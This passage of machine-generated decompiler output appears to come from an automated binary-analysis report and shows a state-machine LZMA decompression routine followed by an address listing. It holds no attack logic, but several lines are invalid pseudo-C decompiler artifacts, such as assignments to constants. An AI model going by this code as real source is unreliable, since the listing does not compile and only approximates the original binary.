                                            				signed int _v84;
                                            				signed int _v88;
                                            				signed int _v92;
                                            				signed int _v95;
                                            				signed int _v96;
                                            				signed int _v100;
                                            				signed int _v104;
                                            				signed int _v108;
                                            				signed int _v112;
                                            				signed int _v116;
                                            				signed int _v120;
                                            				intOrPtr _v124;
                                            				signed int _v128;
                                            				signed int _v132;
                                            				signed int _v136;
                                            				void _v140;
                                            				void* _v148;
                                            				signed int _t537;
                                            				signed int _t538;
                                            				signed int _t572;
                                            
                                            				_t572 = 0x22;
                                            				_v148 = __ecx;
                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                            				if(_v52 == 0xffffffff) {
                                            					return 1;
                                            				}
                                            				while(1) {
                                            					L3:
                                            					_t537 = _v140;
                                            					if(_t537 > 0x1c) {
                                            						break;
                                            					}
                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                            						case 0:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_v116 = _v116 + 1;
                                            							_t537 =  *_v116;
                                            							__eflags = _t537 - 0xe1;
                                            							if(_t537 > 0xe1) {
                                            								goto L174;
                                            							}
                                            							_t542 = _t537 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t576);
                                            							_push(9);
                                            							_pop(_t577);
                                            							_t622 = _t542 / _t576;
                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                            							asm("cdq");
                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                            							_v64 = _t617;
                                            							_v32 = (1 << _t622) - 1;
                                            							_v28 = (1 << _t544 / _t577) - 1;
                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                            							__eflags = 0x600 - _v124;
                                            							if(0x600 == _v124) {
                                            								L12:
                                            								__eflags = _t625;
                                            								if(_t625 == 0) {
                                            									L14:
                                            									_v76 = _v76 & 0x00000000;
                                            									_v68 = _v68 & 0x00000000;
                                            									goto L17;
                                            								} else {
                                            									goto L13;
                                            								}
                                            								do {
                                            									L13:
                                            									_t625 = _t625 - 1;
                                            									__eflags = _t625;
                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                            								} while (_t625 != 0);
                                            								goto L14;
                                            							}
                                            							__eflags = _v8;
                                            							if(_v8 != 0) {
                                            								GlobalFree(_v8);
                                            							}
                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                            							__eflags = _t537;
                                            							_v8 = _t537;
                                            							if(_t537 == 0) {
                                            								goto L174;
                                            							} else {
                                            								_v124 = 0x600;
                                            								goto L12;
                                            							}
                                            						case 1:
                                            							L15:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 1;
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                            							_v116 = _v116 + 1;
                                            							_t50 =  &_v76;
                                            							 *_t50 = _v76 + 1;
                                            							__eflags =  *_t50;
                                            							L17:
                                            							__eflags = _v76 - 4;
                                            							if(_v76 < 4) {
                                            								goto L15;
                                            							}
                                            							_t550 = _v68;
                                            							__eflags = _t550 - _v120;
                                            							if(_t550 == _v120) {
                                            								L22:
                                            								_v76 = 5;
                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                            								goto L25;
                                            							}
                                            							__eflags = _v12;
                                            							_v120 = _t550;
                                            							if(_v12 != 0) {
                                            								GlobalFree(_v12);
                                            							}
                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                            							__eflags = _t537;
                                            							_v12 = _t537;
                                            							if(_t537 == 0) {
                                            								goto L174;
                                            							} else {
                                            								goto L22;
                                            							}
                                            						case 2:
                                            							L26:
                                            							_t557 = _v100 & _v32;
                                            							_v136 = 6;
                                            							_v80 = _t557;
                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                            							goto L135;
                                            						case 3:
                                            							L23:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 3;
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_t72 =  &_v116;
                                            							 *_t72 = _v116 + 1;
                                            							__eflags =  *_t72;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L25:
                                            							_v76 = _v76 - 1;
                                            							__eflags = _v76;
                                            							if(_v76 != 0) {
                                            								goto L23;
                                            							}
                                            							goto L26;
                                            						case 4:
                                            							L136:
                                            							_t559 =  *_t626;
                                            							_t610 = _t559 & 0x0000ffff;
                                            							_t591 = (_v20 >> 0xb) * _t610;
                                            							__eflags = _v16 - _t591;
                                            							if(_v16 >= _t591) {
                                            								_v20 = _v20 - _t591;
                                            								_v16 = _v16 - _t591;
                                            								_v68 = 1;
                                            								_t560 = _t559 - (_t559 >> 5);
                                            								__eflags = _t560;
                                            								 *_t626 = _t560;
                                            							} else {
                                            								_v20 = _t591;
                                            								_v68 = _v68 & 0x00000000;
                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L142;
                                            							} else {
                                            								goto L140;
                                            							}
                                            						case 5:
                                            							L140:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 5;
                                            								goto L173;
                                            							}
                                            							_v20 = _v20 << 8;
                                            							_v112 = _v112 - 1;
                                            							_t464 =  &_v116;
                                            							 *_t464 = _v116 + 1;
                                            							__eflags =  *_t464;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L142:
                                            							_t561 = _v136;
                                            							goto L143;
                                            						case 6:
                                            							__edx = 0;
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v56 = 1;
                                            								_v136 = 7;
                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                            								goto L135;
                                            							}
                                            							__eax = _v96 & 0x000000ff;
                                            							__esi = _v100;
                                            							__cl = 8;
                                            							__cl = 8 - _v64;
                                            							__esi = _v100 & _v28;
                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                            							__ecx = _v64;
                                            							__esi = (_v100 & _v28) << 8;
                                            							__ecx = _v8;
                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                            							__eflags = _v60 - 4;
                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                            							if(_v60 >= 4) {
                                            								__eflags = _v60 - 0xa;
                                            								if(_v60 >= 0xa) {
                                            									_t103 =  &_v60;
                                            									 *_t103 = _v60 - 6;
                                            									__eflags =  *_t103;
                                            								} else {
                                            									_v60 = _v60 - 3;
                                            								}
                                            							} else {
                                            								_v60 = 0;
                                            							}
                                            							__eflags = _v56 - __edx;
                                            							if(_v56 == __edx) {
                                            								__ebx = 0;
                                            								__ebx = 1;
                                            								goto L63;
                                            							}
                                            							__eax = _v24;
                                            							__eax = _v24 - _v48;
                                            							__eflags = __eax - _v120;
                                            							if(__eax >= _v120) {
                                            								__eax = __eax + _v120;
                                            								__eflags = __eax;
                                            							}
                                            							__ecx = _v12;
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                            							goto L43;
                                            						case 7:
                                            							__eflags = _v68 - 1;
                                            							if(_v68 != 1) {
                                            								__eax = _v40;
                                            								_v132 = 0x16;
                                            								_v36 = _v40;
                                            								__eax = _v44;
                                            								_v40 = _v44;
                                            								__eax = _v48;
                                            								_v44 = _v48;
                                            								__eax = 0;
                                            								__eflags = _v60 - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                            								__eax = _v8;
                                            								__eax = _v8 + 0x664;
                                            								__eflags = __eax;
                                            								_v92 = __eax;
                                            								goto L71;
                                            							}
                                            							__eax = _v8;
                                            							__ecx = _v60;
                                            							_v136 = 8;
                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                            							goto L135;
                                            						case 8:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v136 = 0xa;
                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                            							} else {
                                            								__eax = _v60;
                                            								__ecx = _v8;
                                            								__eax = _v60 + 0xf;
                                            								_v136 = 9;
                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                            							}
                                            							goto L135;
                                            						case 9:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								goto L92;
                                            							}
                                            							__eflags = _v100;
                                            							if(_v100 == 0) {
                                            								goto L174;
                                            							}
                                            							__eax = 0;
                                            							__eflags = _v60 - 7;
                                            							_t264 = _v60 - 7 >= 0;
                                            							__eflags = _t264;
                                            							0 | _t264 = _t264 + _t264 + 9;
                                            							_v60 = _t264 + _t264 + 9;
                                            							goto L78;
                                            						case 0xa:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v8;
                                            								__ecx = _v60;
                                            								_v136 = 0xb;
                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                            								goto L135;
                                            							}
                                            							__eax = _v44;
                                            							goto L91;
                                            						case 0xb:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__ecx = _v40;
                                            								__eax = _v36;
                                            								_v36 = _v40;
                                            							} else {
                                            								__eax = _v40;
                                            							}
                                            							__ecx = _v44;
                                            							_v40 = _v44;
                                            							L91:
                                            							__ecx = _v48;
                                            							_v48 = __eax;
                                            							_v44 = _v48;
                                            							L92:
                                            							__eax = _v8;
                                            							_v132 = 0x15;
                                            							__eax = _v8 + 0xa68;
                                            							_v92 = _v8 + 0xa68;
                                            							goto L71;
                                            						case 0xc:
                                            							L102:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xc;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t340 =  &_v116;
                                            							 *_t340 = _v116 + 1;
                                            							__eflags =  *_t340;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							__eax = _v48;
                                            							goto L104;
                                            						case 0xd:
                                            							L39:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xd;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t127 =  &_v116;
                                            							 *_t127 = _v116 + 1;
                                            							__eflags =  *_t127;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L41:
                                            							__eax = _v68;
                                            							__eflags = _v76 - _v68;
                                            							if(_v76 != _v68) {
                                            								goto L50;
                                            							}
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								goto L56;
                                            							}
                                            							L43:
                                            							__eax = _v95 & 0x000000ff;
                                            							_v95 = _v95 << 1;
                                            							__ecx = _v92;
                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                            							_v76 = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi = _v92 + __eax * 2;
                                            							_v20 = _v20 >> 0xb;
                                            							__ax =  *__esi;
                                            							_v88 = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edx;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								_v68 = 1;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								_v68 = _v68 & 0x00000000;
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							_v72 = __ebx;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L41;
                                            							} else {
                                            								goto L39;
                                            							}
                                            						case 0xe:
                                            							L48:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xe;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t161 =  &_v116;
                                            							 *_t161 = _v116 + 1;
                                            							__eflags =  *_t161;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							while(1) {
                                            								L50:
                                            								__eflags = __ebx - 0x100;
                                            								if(__ebx >= 0x100) {
                                            									break;
                                            								}
                                            								__eax = _v92;
                                            								__edx = __ebx + __ebx;
                                            								__ecx = _v20;
                                            								__esi = __edx + __eax;
                                            								__ecx = _v20 >> 0xb;
                                            								__ax =  *__esi;
                                            								_v88 = __esi;
                                            								__edi = __ax & 0x0000ffff;
                                            								__ecx = (_v20 >> 0xb) * __edi;
                                            								__eflags = _v16 - __ecx;
                                            								if(_v16 >= __ecx) {
                                            									_v20 = _v20 - __ecx;
                                            									_v16 = _v16 - __ecx;
                                            									__cx = __ax;
                                            									_t175 = __edx + 1; // 0x1
                                            									__ebx = _t175;
                                            									__cx = __ax >> 5;
                                            									__eflags = __eax;
                                            									 *__esi = __ax;
                                            								} else {
                                            									_v20 = __ecx;
                                            									0x800 = 0x800 - __edi;
                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            									__ebx = __ebx + __ebx;
                                            									 *__esi = __cx;
                                            								}
                                            								__eflags = _v20 - 0x1000000;
                                            								_v72 = __ebx;
                                            								if(_v20 >= 0x1000000) {
                                            									continue;
                                            								} else {
                                            									goto L48;
                                            								}
                                            							}
                                            							L56:
                                            							_t178 =  &_v56;
                                            							 *_t178 = _v56 & 0x00000000;
                                            							__eflags =  *_t178;
                                            							goto L57;
                                            						case 0xf:
                                            							L60:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0xf;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t208 =  &_v116;
                                            							 *_t208 = _v116 + 1;
                                            							__eflags =  *_t208;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L62:
                                            							__eflags = __ebx - 0x100;
                                            							if(__ebx >= 0x100) {
                                            								L57:
                                            								__al = _v72;
                                            								_v96 = _v72;
                                            								goto L58;
                                            							}
                                            							L63:
                                            							__eax = _v92;
                                            							__edx = __ebx + __ebx;
                                            							__ecx = _v20;
                                            							__esi = __edx + __eax;
                                            							__ecx = _v20 >> 0xb;
                                            							__ax =  *__esi;
                                            							_v88 = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edi;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								_t222 = __edx + 1; // 0x1
                                            								__ebx = _t222;
                                            								__cx = __ax >> 5;
                                            								__eflags = __eax;
                                            								 *__esi = __ax;
                                            							} else {
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							_v72 = __ebx;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L62;
                                            							} else {
                                            								goto L60;
                                            							}
                                            						case 0x10:
                                            							L112:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0x10;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t371 =  &_v116;
                                            							 *_t371 = _v116 + 1;
                                            							__eflags =  *_t371;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							goto L114;
                                            						case 0x11:
                                            							L71:
                                            							__esi = _v92;
                                            							_v136 = 0x12;
                                            							goto L135;
                                            						case 0x12:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								__eax = _v92;
                                            								_v136 = 0x13;
                                            								__esi = _v92 + 2;
                                            								L135:
                                            								_v88 = _t626;
                                            								goto L136;
                                            							}
                                            							__eax = _v80;
                                            							_v52 = _v52 & 0x00000000;
                                            							__ecx = _v92;
                                            							__eax = _v80 << 4;
                                            							__eflags = __eax;
                                            							__eax = _v92 + __eax + 4;
                                            							goto L133;
                                            						case 0x13:
                                            							__eflags = _v68;
                                            							if(_v68 != 0) {
                                            								_t475 =  &_v92;
                                            								 *_t475 = _v92 + 0x204;
                                            								__eflags =  *_t475;
                                            								_v52 = 0x10;
                                            								_v68 = 8;
                                            								L147:
                                            								_v128 = 0x14;
                                            								goto L148;
                                            							}
                                            							__eax = _v80;
                                            							__ecx = _v92;
                                            							__eax = _v80 << 4;
                                            							_v52 = 8;
                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                            							L133:
                                            							_v92 = __eax;
                                            							_v68 = 3;
                                            							goto L147;
                                            						case 0x14:
                                            							_v52 = _v52 + __ebx;
                                            							__eax = _v132;
                                            							goto L143;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags = _v60 - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                            							goto L123;
                                            						case 0x16:
                                            							__eax = _v52;
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx = _v8;
                                            							_v68 = 6;
                                            							__eax = __eax << 7;
                                            							_v128 = 0x19;
                                            							_v92 = __eax;
                                            							goto L148;
                                            						case 0x17:
                                            							L148:
                                            							__eax = _v68;
                                            							_v84 = 1;
                                            							_v76 = _v68;
                                            							goto L152;
                                            						case 0x18:
                                            							L149:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 0x18;
                                            								goto L173;
                                            							}
                                            							__ecx = _v116;
                                            							__eax = _v16;
                                            							_v20 = _v20 << 8;
                                            							__ecx =  *_v116 & 0x000000ff;
                                            							_v112 = _v112 - 1;
                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							_t490 =  &_v116;
                                            							 *_t490 = _v116 + 1;
                                            							__eflags =  *_t490;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L151:
                                            							_t493 =  &_v76;
                                            							 *_t493 = _v76 - 1;
                                            							__eflags =  *_t493;
                                            							L152:
                                            							__eflags = _v76;
                                            							if(_v76 <= 0) {
                                            								__ecx = _v68;
                                            								__ebx = _v84;
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx = _v84 - (1 << __cl);
                                            								__eax = _v128;
                                            								_v72 = __ebx;
                                            								L143:
                                            								_v140 = _t561;
                                            								goto L3;
                                            							}
                                            							__eax = _v84;
                                            							_v20 = _v20 >> 0xb;
                                            							__edx = _v84 + _v84;
                                            							__eax = _v92;
                                            							__esi = __edx + __eax;
                                            							_v88 = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = (_v20 >> 0xb) * __edi;
                                            							__eflags = _v16 - __ecx;
                                            							if(_v16 >= __ecx) {
                                            								_v20 = _v20 - __ecx;
                                            								_v16 = _v16 - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								_v84 = __edx;
                                            							} else {
                                            								_v20 = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								_v84 = _v84 << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L151;
                                            							} else {
                                            								goto L149;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								_v48 = __ebx;
                                            								L122:
                                            								_t399 =  &_v48;
                                            								 *_t399 = _v48 + 1;
                                            								__eflags =  *_t399;
                                            								L123:
                                            								__eax = _v48;
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									_v52 = _v52 | 0xffffffff;
                                            									goto L173;
                                            								}
                                            								__eflags = __eax - _v100;
                                            								if(__eax > _v100) {
                                            									goto L174;
                                            								}
                                            								_v52 = _v52 + 2;
                                            								__eax = _v52;
                                            								_t406 =  &_v100;
                                            								 *_t406 = _v100 + _v52;
                                            								__eflags =  *_t406;
                                            								goto L126;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							_v48 = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								_v76 = __ecx;
                                            								L105:
                                            								__eflags = _v76;
                                            								if(_v76 <= 0) {
                                            									__eax = __eax + __ebx;
                                            									_v68 = 4;
                                            									_v48 = __eax;
                                            									__eax = _v8;
                                            									__eax = _v8 + 0x644;
                                            									__eflags = __eax;
                                            									L111:
                                            									__ebx = 0;
                                            									_v92 = __eax;
                                            									_v84 = 1;
                                            									_v72 = 0;
                                            									_v76 = 0;
                                            									L115:
                                            									__eax = _v68;
                                            									__eflags = _v76 - _v68;
                                            									if(_v76 >= _v68) {
                                            										_t397 =  &_v48;
                                            										 *_t397 = _v48 + __ebx;
                                            										__eflags =  *_t397;
                                            										goto L122;
                                            									}
                                            									__eax = _v84;
                                            									_v20 = _v20 >> 0xb;
                                            									__edi = _v84 + _v84;
                                            									__eax = _v92;
                                            									__esi = __edi + __eax;
                                            									_v88 = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = (_v20 >> 0xb) * __ecx;
                                            									__eflags = _v16 - __edx;
                                            									if(_v16 >= __edx) {
                                            										__ecx = 0;
                                            										_v20 = _v20 - __edx;
                                            										__ecx = 1;
                                            										_v16 = _v16 - __edx;
                                            										__ebx = 1;
                                            										__ecx = _v76;
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx = _v72;
                                            										__ebx = _v72 | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										_v72 = __ebx;
                                            										 *__esi = __ax;
                                            										_v84 = __edi;
                                            									} else {
                                            										_v20 = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										_v84 = _v84 << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags = _v20 - 0x1000000;
                                            									if(_v20 >= 0x1000000) {
                                            										L114:
                                            										_t374 =  &_v76;
                                            										 *_t374 = _v76 + 1;
                                            										__eflags =  *_t374;
                                            										goto L115;
                                            									} else {
                                            										goto L112;
                                            									}
                                            								}
                                            								__ecx = _v16;
                                            								__ebx = __ebx + __ebx;
                                            								_v20 = _v20 >> 1;
                                            								__eflags = _v16 - _v20;
                                            								_v72 = __ebx;
                                            								if(_v16 >= _v20) {
                                            									__ecx = _v20;
                                            									_v16 = _v16 - _v20;
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									_v72 = __ebx;
                                            								}
                                            								__eflags = _v20 - 0x1000000;
                                            								if(_v20 >= 0x1000000) {
                                            									L104:
                                            									_t344 =  &_v76;
                                            									 *_t344 = _v76 - 1;
                                            									__eflags =  *_t344;
                                            									goto L105;
                                            								} else {
                                            									goto L102;
                                            								}
                                            							}
                                            							__edx = _v8;
                                            							__eax = __eax - __ebx;
                                            							_v68 = __ecx;
                                            							__eax = _v8 + 0x55e + __eax * 2;
                                            							goto L111;
                                            						case 0x1a:
                                            							L58:
                                            							__eflags = _v104;
                                            							if(_v104 == 0) {
                                            								_v140 = 0x1a;
                                            								goto L173;
                                            							}
                                            							__ecx = _v108;
                                            							__al = _v96;
                                            							__edx = _v12;
                                            							_v100 = _v100 + 1;
                                            							_v108 = _v108 + 1;
                                            							_v104 = _v104 - 1;
                                            							 *_v108 = __al;
                                            							__ecx = _v24;
                                            							 *(_v12 + __ecx) = __al;
                                            							__eax = __ecx + 1;
                                            							__edx = 0;
                                            							_t197 = __eax % _v120;
                                            							__eax = __eax / _v120;
                                            							__edx = _t197;
                                            							goto L82;
                                            						case 0x1b:
                                            							L78:
                                            							__eflags = _v104;
                                            							if(_v104 == 0) {
                                            								_v140 = 0x1b;
                                            								goto L173;
                                            							}
                                            							__eax = _v24;
                                            							__eax = _v24 - _v48;
                                            							__eflags = __eax - _v120;
                                            							if(__eax >= _v120) {
                                            								__eax = __eax + _v120;
                                            								__eflags = __eax;
                                            							}
                                            							__edx = _v12;
                                            							__cl =  *(__edx + __eax);
                                            							__eax = _v24;
                                            							_v96 = __cl;
                                            							 *(__edx + __eax) = __cl;
                                            							__eax = __eax + 1;
                                            							__edx = 0;
                                            							_t280 = __eax % _v120;
                                            							__eax = __eax / _v120;
                                            							__edx = _t280;
                                            							__eax = _v108;
                                            							_v100 = _v100 + 1;
                                            							_v108 = _v108 + 1;
                                            							_t289 =  &_v104;
                                            							 *_t289 = _v104 - 1;
                                            							__eflags =  *_t289;
                                            							 *_v108 = __cl;
                                            							L82:
                                            							_v24 = __edx;
                                            							goto L83;
                                            						case 0x1c:
                                            							while(1) {
                                            								L126:
                                            								__eflags = _v104;
                                            								if(_v104 == 0) {
                                            									break;
                                            								}
                                            								__eax = _v24;
                                            								__eax = _v24 - _v48;
                                            								__eflags = __eax - _v120;
                                            								if(__eax >= _v120) {
                                            									__eax = __eax + _v120;
                                            									__eflags = __eax;
                                            								}
                                            								__edx = _v12;
                                            								__cl =  *(__edx + __eax);
                                            								__eax = _v24;
                                            								_v96 = __cl;
                                            								 *(__edx + __eax) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t420 = __eax % _v120;
                                            								__eax = __eax / _v120;
                                            								__edx = _t420;
                                            								__eax = _v108;
                                            								_v108 = _v108 + 1;
                                            								_v104 = _v104 - 1;
                                            								_v52 = _v52 - 1;
                                            								__eflags = _v52;
                                            								 *_v108 = __cl;
                                            								_v24 = _t420;
                                            								if(_v52 > 0) {
                                            									continue;
                                            								} else {
                                            									L83:
                                            									_v140 = 2;
                                            									goto L3;
                                            								}
                                            							}
                                            							_v140 = 0x1c;
                                            							L173:
                                            							_push(0x22);
                                            							_pop(_t574);
                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                            							return 0;
                                            					}
                                            				}
                                            				L174:
                                            				_t538 = _t537 | 0xffffffff;
                                            				return _t538;
                                            			}










































                                            0x00406bc0
                                            0x00406bc7
                                            0x00406bcd
                                            0x00406bd3
                                            0x00000000
                                            0x00406bd7
                                            0x00406be3
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bf9
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
